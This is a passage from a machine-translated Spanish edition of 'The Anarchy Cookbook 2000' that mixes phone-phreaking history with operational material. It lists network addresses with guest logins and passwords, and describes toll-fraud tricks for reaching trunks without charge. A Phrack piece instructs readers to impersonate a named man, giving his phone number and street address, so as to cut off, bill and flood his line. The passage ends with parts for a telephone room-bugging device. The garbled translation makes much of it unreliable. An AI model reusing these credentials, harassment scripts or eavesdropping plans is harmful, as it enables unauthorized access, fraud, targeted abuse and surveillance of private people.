No está claro quién le dijo a Joe lo que esa noche, pero alguien le dijo que la compañía telefónica tiene un caso abierto y cerrado en su contra por las revelaciones de la actividad ilegal que había hecho a un agente encubierto de la compañía telefónica.

Por la mañana Joe se había convencido de que el periodista de la revista Esquire, con quien había hablado hace dos semanas, fue el agente encubierto. Probablemente tenía feos pensamientos acerca de alguien que no podía ver ganar su confianza, escucharlo hablar de sus obsesiones personales y sus sueños, mientras que la planificación de todo el tiempo para encerrarlo.

"Realmente pensé que era un periodista", dijo Engressia de Memphis Press-Seminario. "Le dije todo lo que ...." Sentirse traicionado, Joe procedió a confesar todo a la prensa y la policía.

Como resultado, la compañía telefónica ha utilizado un agente encubierto para atrapar a Joe, a pesar de que no era el reportero de la revista Esquire.

Irónicamente, los agentes de seguridad fueron alertadas y comenzó a compilar un caso en contra de Joe, porque de uno de sus actos de amor para el sistema: Joe había llamado a un servicio interno de departamento para informar de que había localizado un grupo de defectos de los troncos de larga distancia, y quejarse de nuevo sobre el New Hampshire / problema Missouri WATS. Joe siempre me ha gustado líneas de Ma Bell que estaba limpio y sensible. Un guardavías sospechoso informó Joe a los agentes de seguridad que descubrieron que Joe nunca había tenido una llamada de larga distancia con cargo a su nombre.

A continuación, los agentes de seguridad se enteró de que Joe estaba planeando uno de sus viajes de teléfono a una oficina de cambio de local. La gente de seguridad plantado uno de sus agentes en la oficina de conmutación. Se hizo pasar por un guardagujas estudiante y seguida por Joe en una gira. Él era extremadamente amable y servicial a Joe, que lo llevó alrededor de la oficina por el brazo. Cuando la gira terminó ofreció a Joe un viaje de regreso a su casa de apartamentos. En el camino se le preguntó a Joe - un hombre de tecnología a otro - sobre "los boxeadores de color azul" que había oído hablar. Joe hablaba de ellos libremente, habló de su caja azul con libertad, y sobre todas las otras cosas que podía hacer con los teléfonos.

Al día siguiente, los agentes de seguridad de la compañía de teléfono-golpeó una cinta de vigilancia en la línea de Joe, que finalmente recogió una llamada ilegal. Luego se solicitó la orden de búsqueda y la interrumpió:

En la corte de Joe se declaró no culpable a la posesión de una caja azul y el robo del servicio. Un juez comprensivo redujo los cargos a daños maliciosos y lo encontró culpable de lo que cuenta, lo condenó a dos penas de treinta días para ser servidos al mismo tiempo y luego se suspendió la pena a condición de que nunca promesa de Joe a jugar con los teléfonos de nuevo. Joe había prometido, pero la compañía telefónica se negó a restaurar su servicio. Durante dos semanas después de que el Joe juicio no se pudo llegar a salvo a través de la cabina telefónica en su casa, apartamento, y el propietario proyectó todas las llamadas por él.

Page 222: 106652012 the Anarchy Cookbook 2000 Es

Teléfono-Phreak Carl logró pasar a Joe después de la prueba, e informó de que Joe sonaba aplastado por todo el asunto.

"Lo que me preocupa," Carl me dijo, "es que Joe que significa este momento. La promesa. El hecho de que nunca Phreak teléfono otra vez. Eso es lo que me dijo, que ha dejado de teléfono phreaking para siempre . me refiero a toda su vida. Dice que sabe que va a ser lo miraba tan de cerca por el resto de su vida nunca será capaz de hacer un movimiento sin tener que ir directamente a la cárcel. Parecía muy dividido por el experiencia de ser en la cárcel. Era horrible oírle hablar de esa manera. no sé. Espero que a lo mejor tenía que sonar de esa manera. En el teléfono, ya sabes. "

Él informa que la totalidad del teléfono Phreak subterráneo en los brazos sobre el tratamiento de la compañía telefónica de Joe. "Todo el tiempo Joe tenía sus esperanzas puestas en su solicitud de un puesto de trabajo la empresa telefónica, que lo estaban encadenando a lo largo de está preparando para su busto. Eso me pone loco. Joe pasó la mayor parte de su tiempo a ayudar a cabo. Los hijos de puta. Piensan lo pueden usar como ejemplo. De repente nos están acosando en la costa. Los agentes están saltando en nuestras líneas. Sólo arrestado ------ @ s de silencio ayer y arrancó sus líneas. Pero no importa Joe lo hace, no creo que vamos a aprovechar esta acostado. "

Dos semanas más tarde, suena mi teléfono y cerca de ocho phreaks de teléfono en la sucesión saludar de cerca de ocho diferentes lugares del país, entre ellos Carl, Ed, y Captain Crunch. A nivel nacional teléfono Phreak línea de la conferencia se ha restablecido a través de una máquina de conmutación en --------, con la colaboración de un guardagujas descontentos.

"Tenemos un invitado especial con nosotros hoy", me dice Carl.

La siguiente voz que escucho es de Joe. Él informa que felizmente se acaba de mudar a un lugar llamado Millington, Tennessee, a quince kilómetros en las afueras de Memphis, donde ha sido contratado como técnico de telefónica establecida por una empresa de telefonía independiente de pequeño. Algún día espera ser un solucionador de problemas de equipo.

"Es el tipo de trabajo que soñé. Se enteraron de que me de la publicidad alrededor del juicio. Quizás Ma Bell me hizo un favor que revienta mí. Voy a tener teléfonos en mis manos todo el día."

"Usted sabe la expresión," No te enojes, vengarse '? " teléfono Phreak Carl me preguntó. "Bueno, creo que va a ser mucho lo que le hicieron a Joe y lo que estamos tratando de hacer para nosotros."

Historia de la 151.The Phreaking británica por Lex Luthor

Nota: La oficina de correos británica, es el equivalente de EE.UU. de Ma Bell. En Gran Bretaña, phreaking se remonta a principios de los años cincuenta, cuando la técnica de "peaje telón de fondo 'fue descubierto. Número uno era un intercambio de cerca de St.Paul 's que se enrutan las llamadas entre Londres y cerca de los intercambios no-Londres. El truco consistía en marcar un número no asignado, y luego presione el receptor de descanso durante ½ segundo. Este intermitente iniciada la señal de "avance claro", dejando a la persona que llama con una línea abierta en el número de un intercambio. A continuación, podría marcar el 018, que lo remitió a la central del tronco en ese momento, el primer intercambio de larga distancia en el Reino Unido y seguir con el código para el intercambio a distancia a la que se conecta sin ningún cargo adicional.

Las señales necesarias para controlar la red del Reino Unido de hoy fueron publicados en la "Institución de la oficina de correos Diario Ingenieros" y reimpreso en el Sunday Times (15 de octubre de 1972).

El sistema de señalización que utilizan: señalización del sistema de usos N º 3 pares de frecuencias seleccionadas a partir de 6 tonos separados por 120Hz. Con esa información, los phreaks hecho "bleepers" o como se les llama aquí en los EE.UU. "caja

Page 223: 106652012 the Anarchy Cookbook 2000 Es

azul", pero sí utilizan diferentes tonos MF continuación, los EE.UU., por lo tanto, el cuadro azul que EE.UU. se introducen de contrabando en el Reino Unido no va a funcionar , a menos que cambie las frecuencias.

En los años setenta, un sistema más simple basada en diferentes números de pulsos con la misma frecuencia (2280hz) se utilizó. Para más información sobre esto, trate de obtener una bodega de: "Tecnología y Sistemas de Telefonía" de Atkinson.

En los primeros días de phreaking británico, la Universidad de Cambridge Titán equipo se utilizó para grabar y distribuir los números encontrados por la marcación exhaustiva de las redes locales. Estos números fueron utilizados para crear una cadena de enlaces de intercambio local de intercambio local en todo el país, sin pasar por los circuitos troncales. Debido a que los códigos internos de enrutamiento en la red del Reino Unido no son los mismos que los marcados por la persona que llama, los phreaks tenía que descubrir por "la sonda y escuchar las técnicas o más comúnmente conocidos en los EE.UU. - de exploración. Lo que hicieron fue puesto en las señales de probables y escuchó para saber si lo lograron. Los resultados de la exploración se distribuyeron a los phreaks otros. El descubrimiento de unos a otros se tomó el tiempo al principio, pero finalmente los phreaks se organizaron. El "grifo" de Gran Bretaña se llamó "corrientes subterráneas" que permitió a phreaks británicos para compartir la información sobre los nuevos números, equipos, etc

Para entender lo que los británicos hicieron phreaks, piense en la red de telefonía en tres capas de líneas: llamadas locales, interurbanas e internacionales. En el Reino Unido, el suscriptor marcación tronco (ETS), es el mecanismo que lleva a una llamada de las líneas locales y (legítimamente) la eleva a un tronco o internacional. Los phreaks del Reino Unido calculó que una llamada a nivel del tronco se pueden dirigir a través de cualquier número de intercambios, a condición de que los códigos de enrutamiento correctas se encontraron y se utilizan correctamente. También tenía que descubrir cómo llegar desde el nivel local al tronco ya sea sin cargo alguno (lo cual hicieron con una caja de buscapersonas) o sin utilizar (ETS). El encadenamiento ya se ha mencionado, pero que requiere largas cadenas de dígitos y el habla se vuelve más y más débil que la cadena crece, al igual que lo hace cuando se apilan los troncos de ida y vuelta en los EE.UU.. La forma en que la seguridad de los reps enganchado phreaks era poner un simple 'printermeter "o como lo llamamos: Un registro de la pluma en la línea de sospechosos, que muestra todos los dígitos marcados desde la línea de suscriptores.

Los británicos prefieren subirse a los troncos en lugar de encadenamiento. Una forma fue descubrir que las llamadas locales utilizan los troncos de los intercambios entre vecinos, iniciar una llamada y permanecer en el tronco en lugar de regresar al nivel local en alcanzar el interruptor a distancia. De nuevo, esto requiere la marcación exhaustiva y hacer más trabajo de titán, sino que también reveló los violines ", que fueron insertados por los ingenieros de la oficina de correos.

¿Qué significa tocar el violín es que los ingenieros de recableado de los intercambios para su propio beneficio. El equipo se ha modificado para permitir el acceso a un tronco sin cargos, una operación que es bastante fácil en el paso a paso (SxS) electro-mecánicos de intercambios, que se instalaron en Gran Bretaña, incluso en la década de 1970 (Nota: No sé de una puerta trasera en el sistema canadiense en un Co. 4A, así que si usted está en un SxS o 4A, intente explorar intercambios 3 dígitos, es decir: marcar el 999998997, etc y escuchar el bip-kerchink, si no hay códigos de 3 dígitos que permiten directa el acceso a un tándem en el intercambio local y no pasa por la AMA para que no se le cobrará, no tiene que arruinar 2600 cada vez que desee a la caja de una llamada.

'El violinista' Un famoso británica reveló a principios de 1970 ha funcionado marcando 173. La persona que llama y añadió el código de tronco de 1 y el número de suscriptores locales. En ese momento, la mayoría de los servicios de ingeniería de pruebas se inició con 17X, por lo que los ingenieros pudieran ocultar sus violines en el nido de cables de servicio. Cuando los representantes de seguridad comenzó a buscar, los violines fueron ocultados por los tonos de señalización: «número no disponible" o "equipo comprometido" que se apaga después de un retraso. Los relés necesarios son pequeños y fáciles de esconder.

Page 224: 106652012 the Anarchy Cookbook 2000 Es

No había otra cara de phreaking en el Reino Unido en los años sesenta. Antes de enfermedades de transmisión sexual fue generalizada, muchas personas 'normales' se vieron obligados a.

Phreaking ocasional de pura frustración en el sistema troncal del operador controlado por ineficiente. Esto vino a la cabeza durante una huelga de 1961, cuando los operadores no pudieron ser contactados. Nada de lo complicada que se necesitaba. Muchos operadores han tenido la costumbre de repetir los códigos, ya que marcó los números solicitados para que la gente pronto se enteró de los números que llama con frecuencia. El único "truco" era saber que los intercambios pueden ser marcados a través de pasar en el número de línea. Quienes llamen también necesitaba un lugar muy tranquilo para hacerlo, ya que el tiempo relativo a los clics era importante. El juicio más famoso de phreaks británicos se llamaba el viejo ensayo de Baily. Que se inició el 03 de octubre 1973. Lo que los phreaks hizo fue marcar un número de repuesto a un precio de llamada local, pero la participación de un tronco a otro cambio de entonces se envió una 'clara a seguir "a su local de cambios, lo que indica que lo que la llamada había terminado, pero el intercambio a distancia doesn' se dan cuenta, porque el teléfono de la persona que llama está todavía fuera del gancho. Ahora tienen una línea abierta en el intercambio a distancia del tronco y se envía a un 'apoderarse' de la señal: '1 'que le pone en sus líneas de salida ahora, si saben los códigos, el mundo está abierto para ellos. Todos los intercambios de otros confiar en su central telefónica local para manejar la facturación, sino que simplemente interpretar los tonos que escuchan. Mientras tanto, la bolsa local acumula sólo para una llamada local. Los investigadores descubrieron los phreaks celebración de una conferencia en algún lugar de Inglaterra, rodeado por varios equipos de telefonía y las cajas de Bleeper, también códigos postales 'secretos' lista las impresiones de oficina. (¿Es probable que los obtuvo destrozar) El juez dijo: "Algunos toman a la heroína, algunos toman a los teléfonos." para ellos phone phreaking no era un crimen, sino un pasatiempo para compartir con los amantes phellow y discutido con la oficina de correos abierta durante la cena y por correo. Su enfoque y la actitud en el equipo más grande del mundo, el sistema telefónico mundial, fue el de los científicos que realizan experimentos o programadores e ingenieros evalúan los programas y sistemas. El juez pareció estar de acuerdo, e incluso les pidió phreaking códigos a utilizar en su central local!

152.Bad como la mierda por The Jolly Roger

Recientemente, un fanático del teléfono en el noroeste hizo un interesante descubrimiento. Él estaba estudiando el código de área 804 (Virginia) y se enteró de que la central 840 hizo algo extraño.

En la gran mayoría de los casos, de hecho, en todos los casos excepto uno, se obtendría una grabación como si el intercambio no existía. Sin embargo, si marcaba 804-840 y cuatro números en lugar predecibles, se puso un anillo!

Después de uno o dos anillos, alguien recogió. Que se vive en este tipo de cosas, se podría decir que la llamada no "supe", es decir, sin cargos estaban siendo realizados para llamar a este número.

(Las llamadas que usted recibe un mensaje de error, o un operador especial, por lo general no supervisan.) Una voz femenina, con un dejo de acento sureño, dijo, "Operador, ¿puedo ayudarle?"

"Sí," dijo, "¿A qué número he llegado?"

"¿Qué número ha marcado, señor?"

Se hizo un número que fue similar.

"Lo siento que no es el número que llegó." Haga clic en.

Page 225: 106652012 the Anarchy Cookbook 2000 Es

Estaba fascinado. Lo que en el mundo era esto? Sabía que iba a llamar de vuelta, pero antes que él, trató de experimentos un poco más. Trató de la central 840 en varios otros códigos de área. En algunos casos, surgió como un intercambio válido. En otros, exactamente lo mismo que pasó - las mismas últimos cuatro dígitos, la misma Southern Belle. Por extraño que parezca, más tarde se observó, las áreas de trabajo en el que parecía viajar en una línea recta desde Washington DC a Pittsburgh, PA.

Él volvió a llamar desde un teléfono público. "Operador, ¿puedo ayudarle?"

"Sí, esta es la compañía de teléfonos. Estoy probando esta línea y que no parecen tener una identificación en el circuito. ¿Qué oficio es esto, por favor?"

"¿Qué número está tratando de alcanzar?"

"No estoy tratando de llegar a cualquier número. Estoy tratando de identificar a este circuito."

"Lo siento, no puedo ayudarte".

"Señora, si no recibe una ID en esta línea, voy a tener que desconectarlo. Se muestra ningún registro de ella aquí."

"Espera un momento, señor."

Después de un minuto, volvió. "Señor, yo puedo tener a alguien hablar con usted. ¿Me da su número, por favor?"

Se había previsto y que tenía el número de teléfono de pago listo. Después de que él le dio, dijo, "El señor XXX recibirá de vuelta a ti."

"Gracias". Colgó el teléfono. El teléfono sonó. AL INSTANTE! "Oh, Dios mío", pensó, "Ellos no pedían mi número - que lo estaban confirmando!"

"Hola", dijo, tratando de parecer auténticas.

"Este es el señor XXX. ¿Acabas de hacer una consulta a mi oficina, relativa a un número de teléfono?"

"Sí. Necesito una identificación -"

"Lo que necesitas es un consejo. No vuelvas a llamar a ese número otra vez. Olvidar que alguna vez lo sabía."

En este punto, nuestro amigo se puso tan nervioso que apenas colgó el teléfono. Él esperaba oír el timbre del teléfono de nuevo, pero no fue así.

En los próximos días se devanaba los sesos tratando de averiguar lo que el número era. Sabía que era algo grande - que era bastante seguro en este momento. Era tan grande que el número estaba programado en cada oficina central en el país. Lo sabía porque si intentaba llamar a cualquier otro número en el que el intercambio, se ponía un mensaje de error local de la CO, como si el intercambio no existía.

Por último, se le acercaron. Tenía un tío que trabajaba en una agencia federal. Tenía la sensación de que este gobierno se relacionó y si lo fuera, su tío probablemente podría encontrar de qué se trataba. Le preguntó al día siguiente y su tío se comprometió a investigar el asunto.

La próxima vez que vio a su tío, él notó un gran cambio en su forma. Estaba temblando. "¿De dónde sacaste ese número?" -gritó. "¿Sabe usted que casi fue despedido por preguntar al respecto?? No dejaban de querer saber dónde lo tengo."

Nuestro amigo no pudo contener su emoción. "¿Qué es?" que se declaró. "¿Cuál es el número?"

Page 226: 106652012 the Anarchy Cookbook 2000 Es

"ES REFUGIO DEL PRESIDENTE BOMBA!"

Nunca volvió a llamar el número después de eso. Sabía que probablemente podría causar un poco de emoción al llamar al número y diciendo algo como: "El clima no es bueno en Washington. Estamos llegando a hacerles una visita." Pero nuestro amigo era inteligente. Sabía que había algunas cosas que estaban en mejor situación sin decir y hacer aquello.

153.Telenet por The Mad Max

Parece que no muchos de ustedes saben que Telenet está conectada a cerca de 80 redes de ordenadores en el mundo. No, no me refiero a 80 nodos, pero las redes de 80, con miles de computadoras sin protección. Cuando usted llame a su puerta de entrada Telenet-, sólo puede llamar a los equipos que acepten el cobro revertido de llamadas-. Si desea llamar a los equipos de países extranjeros o computadoras en EE.UU., que no aceptan las llamadas R-, se necesita un Telenet-ID. ¿Te has dado cuenta de que puede escribir XXXX ID cuando está conectado a Telenet? A continuación se le pedirá la contraseña. Si usted tiene un NUI (Red-ID de usuario) puede llamar a casi todos los host conectado a cualquier ordenador de la red en el mundo. He aquí algunos ejemplos:

026245400090184: Es un VAX en Alemania (Nombre de Usuario: DATEXP y dejar el correo para Chris)0311050500061: ¿Está el Los Alamos Integrado de la computación en red (uno de los hosts conectados a la misma es el ADN (Agencia de Defensa Nuclear)!)0530197000016: Es un BBS en Nueva Zelanda024050256: Es la SE-Bank en Estocolmo, Suecia (Entrar como juegos!)Ingresar el CERN en Ginebra, en Suiza (uno de los mayores centros de investigación nuclear en el mundo) como INVITADO: 022846811405410234212301161: Un sistema de Videotex estándar. Tipo OPTEL para entrar y usar el ID con el 999_ 9_ contraseña0242211000001: Universidad de Oslo en Noruega (17,17 Tipo de acceso para jugar el Multi-User Dungeon-!)0425130000215: Algo así como ITT Dialcom, pero éste se encuentra en Israel! Ayuda para la identificación con la ayuda de contraseña funciona bien con el nivel de seguridad 30310600584401: Es el Washington Post News Service a través de Tymnet (Sí, Tymnet está conectado a Telenet, también!) ID y la contraseña es: PETER Usted puede leer las noticias del día siguiente!

Los prefijos son los siguientes:02624 es de Datex-P en Alemania02342 es PSS en Inglaterra03110 es Telenet en EE.UU.03106 es Tymnet en EE.UU.02405 es Telepak en Suecia04251 es Isranet en Israel02080 es Transpac en Francia02284 es Telepac en Suiza02724 es Eirpac en Irlanda02704 es Luxpac en Luxemburgo05252 es Telepac en Singapur04408 es Venus-P en Japón... Y así sucesivamente ... Algunos de los países tienen más de una conmutación de paquetes de la red (EE.UU. tiene 11, Canadá cuenta con 3, etc.)

Aceptar. Esto debería ser suficiente por el momento. Como se puede ver la mayoría de las contraseñas son muy simples. Esto se debe a que no debe tener ningún temor a los piratas informáticos. Sólo unos pocos hackers alemanes utilizan estas redes. La mayoría de las computadoras son absolutamente fácil de hackear! Por lo tanto, tratar de encontrar algunos de Telenet-ID y los dejan aquí. Si necesita más números, dejan de correo electrónico. Estoy llamando desde Alemania a través de la alemana Datex-P de la red, que es similar a Telenet. Tenemos un montón de los de NUI de la red en Alemania,

Page 227: 106652012 the Anarchy Cookbook 2000 Es

pero ninguno para un especial de Tymnet-marcación externa-equipo en EE.UU., lo que me conecta a cualquier número de teléfono.

Llame 026245621040000 y el identificador de tipo de INF300 con contraseña DATACOM para obtener más información sobre las redes de conmutación de paquetes! La nueva contraseña para el Washington Post es REY!!

154.Fucking con el operador por la Jolly Roger

¿Alguna vez un operador que le dio un tiempo difícil, y no sabía qué hacer? Bueno, si el operador de escucha se utiliza una jerga campanilla, que podría caer en la cuenta. Aquí está un pequeño diagrama (con perdón de la obra de arte) de la estructura de los operadores

/ -------- \ / ------ \ / ----- \! Operador ->! S.A.! --->! BOS!\ -------- / \ ------ / \ ----- / ! ! V/ ------------- \! Jefe de grupo!\ ------------- /

Ahora, la mayoría de los operadores no se molestó, por lo que puede maldecir a ti, si lo piden al instante para el "SA" o el Servicio de Asistente. El operador no se presenta a ella (95% de ellos son de ella), sino que va a resolver la mayoría de sus problemas. Ella le tiene que dar su nombre ya que se conecta y todas estas llamadas se molestó. Si la SA le ofrece un momento difícil conseguir su BOS (Supervisor de Oficina de Negocios) en la línea. S / él es casi siempre una copia de sus hijas, pero a veces el SA se embreado y emplumado. El operador informa al Jefe de Grupo, y S / Él va a resolver el 100% de sus problemas, pero las posibilidades de obtener S / Él en la línea son nulas.

Si un instalador de líneas (el tipo que funciona en los polos) o un hombre de instalación que ofrece las obras pida hablar con el capataz de instalación, que funciona de maravilla.

Aquí está la jerga otra campana, que puede ser útil si usted está teniendo problemas con la línea. O pueden ser utilizados para mentir a su manera de salir de situaciones ....

Un Erling es una línea ocupada durante 1 hora, utilizado sobre todo en los estudios de tráfico una señal permanente es aquel terrible grito que se obtiene si se desconecta, pero no se cuelgue.

Todo el mundo sabe lo que es una señal de ocupado, pero algunos idiotas creen que es el timbre * real * del teléfono, cuando sólo es un tono de pitidos cuando el teléfono está sonando, no apostaría por esto, sin embargo, puede (y lo hace) pierden la sincronización.

Cuando se recibe una señal de ocupado que es 2 veces más rápida que la normal, la persona que está tratando de llegar no es realmente en el teléfono, (podría ser), es en realidad la señal de que una línea de enlace en algún lugar está ocupado y no tiene o no puede desviar la llamada. A veces conseguirás una grabación, o si usted no consigue nada en absoluto (izquierda High & Dry, en términos fone) todas las grabaciones se están utilizando y el sistema es muy usado en exceso, probablemente será recordado dentro de un rato. Esto ocurrió cuando Kennedy fue asesinado, el sistema simplemente no puede manejar las llamadas. Por cierto, esto se llama el "cambiar el orden de la señal" y la línea troncal está "bloqueado".

Page 228: 106652012 the Anarchy Cookbook 2000 Es

Una cosa más, si una llamada en el extranjero no se ha completado y no genera dinero para AT & T, se llama "Aire y Agua de llamadas".

155.Phrack Magazine - vol. 1, número 1 por el soldado de hierro

"Mía es la venganza", dice el Phreak.

MÉTODO 1-LÍNEA TELEFÓNICA PhunLlame a la oficina de negocios. Se debe aparecer en la parte delantera de las páginas blancas. Digamos que usted quiere desconectar la línea de Scott Korman. DIAL 800-xxx-xxxx.

"Hola, este es el Sr. Korman, me voy a mudar a California y le gustaría tener a mi servicio de teléfono desconectado. Estoy en el aeropuerto ahora. Estoy llamando desde un teléfono público, mi número es [414] 445 5005. Usted puede enviar la factura final: (algún lugar de California) Muchas gracias "..

MÉTODO 2-LIBROS DE TELÉFONOLlame a la oficina de negocios desde un teléfono público. Di:

"Hola, me gustaría pedir una guía telefónica para el Alto Volta (o cualquier otra área fuera de la manera con discado directo). Este es Scott Korman, barco de 3119 N. 44th St. Milwaukee, WI 53216. Sí, Yo en pie va a costar $ xx ($ 25 - $ 75). Gracias ".

Método 3 las llamadas telefónicasLlame a un PBX, introduzca el código y obtener una línea externa. A continuación, marque el 0 + el número al que desea llamar. Oirá un bonk y luego un operador. Diga: "Me gustaría que se cobre de teléfono de mi casa en el 414-445-5005. Gracias." Un amigo y yo hicimos a un perdedor, le llamé a las 1:00 am y salimos de la fone descolgado toda la noche. He calculado que le costó $ 168.

MÉTODO 4-MISC. SERVICIOSLlame a la oficina de negocios, una vez más de un payfone. Dice que le gustaría llamada en espera, reenvío, de 3 vías, etc Una vez más, usted es el famoso perdedor de Scott Korman. Paga-se ríe. No sabes lo divertido que estaba hablando con él, y me preguntaba qué esos clics se seguía oyendo.

MÉTODO 5-cambiado y sin publicar¿Es el mismo que en # 4, pero dice que le gustaría cambiar y no listados a su (Scott)número. Cualquiera que llame a él se obtiene:

"BEW BEW BEEP. El número que ha alcanzado, 445-5005, se ha cambiado a un número no publicado. No más ....."

MÉTODO 6-TRANSMISIÓNEsto requiere un cómplice o dos o tres. Alrededor de la época de Navidad, ir a Toys 'R' Us. Haga que todos en el servicio al cliente o en el escritorio del gerente de distancia ("Oye, ¿me podría ayudar a"). Entonces usted consigue en su teléfono y marque (por lo general primero marque 9) y la oficina de negocios de nuevo. Esta vez, dicen que son de Toys 'R' Us, y que le gustaría añadir el desvío de llamadas al 445-5005. Scott recibe 100-600 llamadas al día!

MÉTODO 7-RUSO DE LLAMADASLlamar a un teléfono público a las 10:00 PM. Diga al operador que le gustaría reservar un llamamiento a Rusia. Digamos que usted está llamando desde un teléfono público, y su número es el de los perdedores para freír (por ejemplo, 445-5005). Ella dirá que ella tendrá que volver a llamar ya en 5 horas, y usted bien que. Mientras tanto, el perdedor (por ejemplo) Scott, recibirá una llamada a las 3:00 am de un operador diciendo que la llamada que efectuó la reserva de Rusia está dispuesta.

Page 229: 106652012 the Anarchy Cookbook 2000 Es

Listado de Código País 156.International por The Jolly Roger

* REINO UNIDO / IRLANDA------------------------------------IRLANDA ......................... 353REINO UNIDO ................... 44

* EUROPA------------------------------------ANDORRA .......................... 33AUSTRIA .......................... 43BÉLGICA .......................... 32CHIPRE .......................... 357CZECHOLSLOVAKIA .................. 42DINAMARCA .......................... 45FINLANDIA ......................... 358Francia ........................... 33REPUBLICA DEMOCRATICA ALEMANA ....... 37ALEMANIA, LA REPÚBLICA FEDERAL DE ..... 49GIBRALTAR ....................... 350GRECIA ........................... 30HUNGRÍA .......................... 36ISLANDIA ......................... 354Italia ............................ 39LIECHTENSTEIN .................... 41LUXEMBURGO ...................... 352MONACO ........................... 33PAÍSES BAJOS ...................... 31NORUEGA ........................... 47POLONIA ........................... 48PORTUGAL ........................ 351RUMANIA .......................... 40SAN MARINO ....................... 39ESPAÑA ............................ 34SUECIA ........................... 46SUIZA ...................... 41TURQUÍA ........................... 90CIUDAD DEL VATICANO ..................... 39YUGOSLAVIA ....................... 38

* América Central------------------------------------BELICE ......................... 01 ½COSTA RICA ½ ..................... 06EL SALVADOR .................... 03 ½GUATEMALA ...................... 02 ½HONDURAS ½ ....................... 04NICARAGUA ...................... 05 ½PANAMÁ ......................... 07 ½

* AFRICA------------------------------------ARGELIA ......................... 213CAMERÚN ........................ 237EGIPTO ............................ 20ETIOPÍA ........................ 251GABÓN ........................... 241COSTA DE MARFIL ..................... 225KENIA ........................... 254LESOTHO ......................... 266LIBERIA ......................... 231

Page 230: 106652012 the Anarchy Cookbook 2000 Es

LIBIA ........................... 218MALAWI .......................... 265MARRUECOS ......................... 212NAMIBIA ......................... 264NIGERIA ......................... 234SENEGAL ......................... 221SUDÁFRICA ..................... 27SUAZILANDIA ....................... 268TANZANIA ........................ 255TÚNEZ ......................... 216UGANDA .......................... 256ZAMBIA .......................... 260ZIMBABWE ........................ 263

* PACÍFICO------------------------------------SAMOA AMERICANA .................. 684AUSTRALIA ........................ 61BRUNEI .......................... 673FIYI ............................ 679Polinesia Francesa ................ 689GUAM ............................ 671HONG KONG ....................... 852INDONESIA ........................ 62JAPÓN ............................ 81COREA, REPÚBLICA DE ............... 82MALASIA ......................... 60NUEVA CALEDONIA ................... 687NUEVA ZELANDA ...................... 64PAPUA NUEVA GUINEA ................ 675FILIPINAS ...................... 63SAIPAN .......................... 670SINGAPUR ........................ 65TAIWAN .......................... 886TAILANDIA ......................... 66

* Océano Índico------------------------------------PAKISTÁN ......................... 92SRI LANKA ........................ 94

* América del Sur------------------------------------ARGENTINA ....................... 4 ½BOLIVIA ........................ 91 ½BRASIL .......................... 5 ½CHILE ........................... 6 ½COLOMBIA ........................ 7 ½ECUADOR ........................ 93 ½GUYANA ......................... 92 ½PARAGUAY ....................... 95 ½PERÚ ............................ 1 ½SURINAM ........................ 97 ½URUGUAY ........................ 98 ½VENEZUELA ....................... 8 ½

* CERCANO ORIENTE------------------------------------BAHREIN ......................... 973IRÁN ............................. 98IRAK ............................ 964ISRAEL .......................... 972JORDANIA .......................... 962

Page 231: 106652012 the Anarchy Cookbook 2000 Es

KUWAIT .......................... 965OMÁN ............................ 968QATAR ........................... 974ARABIA SAUDITA .................... 966EMIRATOS ÁRABES UNIDOS ............ 971República Árabe del Yemen ............. 967

* EL CARIBE / ATLÁNTICO------------------------------------Antillas Francesas ½ ................ 96Guantánamo (EE.UU. de la Base Naval) ... 3 ½HAITÍ .......................... 09 ½PAÍSES BAJOS ANTILLAS ½ ........... 99ST. Pedro y Miquelón ½ ........ 08

* LA INDIA------------------------------------INDIA ............................ 91

* CANADÁ------------------------------------Para llamar a Canadá, marcar 1 + código área + número local.

* MÉXICO------------------------------------DEBE LLAMAR A MEXICO, marque 011 + 52 + código de ciudad + número local.

Para realizar llamadas internacionales:

Código de acceso internacional + código país + código de enrutamiento

Ejemplo:

Para llamar a Frankfurt, Alemania, debe hacer lo siguiente:

011 + 49 + 611 + (# quería) + # signo (octothrope)

El signo # al final es decirle a Bell que haya terminado de introducir en toda la información necesaria.

Transmisor de Infinity 157.The: por el Espíritu del viento <<< >>>

EL LIBRO DE CONSTRUIR SU PROPIOLASER, PHASER, ION Ray Gun Y OTROS PROYECTOS DE TRABAJO de la era espacial

POR ROBERT Iannini (TAB Books Inc.)

Descripción: En pocas palabras, el transmisor Infinity es un dispositivo que se activa un micrófono a través de una llamada telefónica. Se conecta a la línea telefónica, y cuando suena el teléfono, inmediatamente se intercepte el anillo y difusión en el teléfono cualquier sonido que está en la habitación. Este dispositivo fue presentada originalmente por información ilimitada, y tenía un decodificador de tonos al tacto para evitar que todos los que no conoce el código de la posibilidad de usar el teléfono en su forma normal. Esta versión, sin embargo, se activará el micrófono para cualquier persona que llama mientras está en funcionamiento.

NOTA: Es ilegal el uso de este dispositivo para tratar a alguien de error. También es bastante estúpido, ya que son bastante notables.

Lista de piezas:Haga de cuenta que uF significa micro Farad, la tapa del condensador =

Page 232: 106652012 the Anarchy Cookbook 2000 Es

Parte # Descripción----------------R1, 4,8 3 390 k vatio ¼R2 1 5,6 M ¼ vatios de resistenciaR3, 5,6 3 6,8 k de resistencia de ¼ WR7/S1 1 5 k pote / interruptorR9, 16 2 100 k vatio ¼R10 1 2.2 k = vatioR13, 18 2 1 k vatio ¼R14 1 470 ohm ¼ watt resistenciaR15 1 10 k ¼ de vatioR17 1 1 M ¼ de vatioC1 1 0.05 uF/25 V disco de la tapaC2, 3,5,6,7 5 1 uF 50 V electrolítico gorra o importante (preferentemente no polarizado)C4, 11,12 3 0,01 uF/50 V disco de la tapaC8, 10 2 100 uF a 25 V electrolítico de la tapaC9 1 5 uF @ 150 V electrolytic capC13 1 10 uF a 25 V electrolítico de la tapaTM1 1 555 temporizador de caídaA1 1 CA3018 amplificador serie en el cP1 y P2 dos PN2222 transistor NPN silQ3 1 D4OD5 PWR NPN transistor de fichaD1, 2 2 50 V 1 amp reaccionar. 1N4002T1 1 1 ½ k/500 transformador de adaptaciónM1 1 micrófono de cristal de granJ1 1 Entrada de sonido opcional para salida de sentidoWR3 (24 ") # 24 del gancho rojo y negro arriba en el cableWR4 (24 ") # 24 del gancho de alambre negro hastaCL3, 4 2 pinzas de cocodriloCL1, 2 2 6 "clips rápidos de la bateríaPB1 1 1 ½ 3/4x4 x.1 perfboardCA1 1 5 ¼ x3x2 1/8 gris, caja fabWR15 (12 ") # 24 cable de busKN1 una perilla de plástico pequeñaBU1 un manguito de sujeción pequeñaB1, 2 2 9 voltios de la batería del transistor 9V o Ni-Cad

